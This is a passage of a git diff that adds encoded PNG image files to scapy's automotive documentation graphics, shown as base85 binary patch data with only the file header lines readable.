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 LY{|UJa1H$*uT~su literal 0 HcmV?d00001 diff --git a/doc/scapy/graphics/automotive/autosar2.png b/doc/scapy/graphics/automotive/autosar2.png new file mode 100644 index 0000000000000000000000000000000000000000..5c0aee7529245fea3602b58e0a097be923a09ea9 GIT binary patch literal 20598 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 